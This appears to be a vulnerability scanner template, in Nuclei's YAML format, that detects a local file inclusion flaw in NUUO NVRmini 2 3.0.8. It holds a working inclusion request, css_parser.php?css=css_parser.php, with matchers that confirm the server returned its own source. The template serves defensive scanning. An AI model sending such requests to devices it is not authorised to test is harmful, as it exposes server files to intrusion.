id: nuuo-file-inclusion

info:
  name: NUUO NVRmini 2 3.0.8 - Local File Inclusion
  author: princechaddha
  severity: high
  description: NUUO NVRmini 2 3.0.8 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/40211
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: lfi,edb,nuuo

requests:
  - method: GET
    path:
      - "{{BaseURL}}/css_parser.php?css=css_parser.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "$_GET['css']"

      - type: word
        part: header
        words:
          - "text/css"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/04
